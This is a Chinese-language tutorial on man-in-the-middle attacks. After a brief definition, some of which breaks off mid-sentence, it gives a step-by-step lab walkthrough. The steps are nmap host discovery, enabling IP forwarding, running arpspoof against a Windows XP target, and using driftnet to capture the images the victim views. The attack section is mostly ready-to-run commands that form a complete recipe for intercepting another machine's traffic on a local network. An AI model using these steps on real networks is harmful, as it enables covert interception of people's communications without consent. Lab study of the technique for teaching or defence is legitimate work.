中間人攻擊（ARPspoof）

1.介紹：

中間人攻擊（Man-in-the-MiddleAttack，簡稱“MITM攻擊”）是一種“間接”的入侵攻擊，這種攻擊模式是通過各種技術手段將受入侵者控制的一臺計算機虛擬放置在網路連線中的兩臺通訊計算機之間，這臺計算機就稱為“中間人”。

2.簡介

中間人攻擊（Man-in-the-Middle Attack, MITM）是一種由來已久的網路入侵手段，並且當今仍然有著廣泛的發展空間，如SMB會話劫持、DNS欺騙等攻擊都是典型的MITM攻擊。簡而言之，所謂的MITM攻擊就是通過攔截正常的網路通訊資料，並進行資料篡改和嗅探，而通訊的雙方卻毫不知情。

隨著計算機通訊網技術的不斷髮展，MITM攻擊也越來越多樣化。最初，攻擊者只要將網絡卡設為混雜模式，偽裝成

3.攻擊方式

中間人攻擊（Man-in-the-MiddleAttack，簡稱“MITM攻擊”）中間人攻擊很早就成為了黑客常用的一種古老的攻擊手段，並且一直到如今還具有極大的擴充套件空間。在網路安全方面，MITM攻擊的使用是很廣泛的，曾經猖獗一時的SMB

4.攻擊復現

環境準備

（1）kali系統

（2）Windows xp系統（兩個系統一定要在同一網段下）

實驗開始

1.使用nmap探測區域網內的主機

執行命令 nmap -sP 192.168.80.0/24(這裡自己查兩臺主機的區域網IP)

2.使用arpspoof 執行arp欺騙，毒化被欺騙者（Windows xp）

執行如下命令啟用IP轉發：

echo 1 > /proc/sys/net/ipv4/ip_forward

注：這裡一定要IP轉發不然到擷取被攻擊者的圖片的時候，沒有出來

3.接著執行命令，將被欺騙者的流量重定向給攻擊者，再由攻擊者轉發給被欺騙者

arpspoof -i eth0 -t 192.168.80.150 192.168.80.2

4.執行driftnet命令，擷取被攻擊者圖片

driftnet -i eth0

被攻擊者瀏覽的網頁

這樣就攻擊完成啦~

此次攻擊還是比較簡單的，有問題可以提問

越努力越幸運~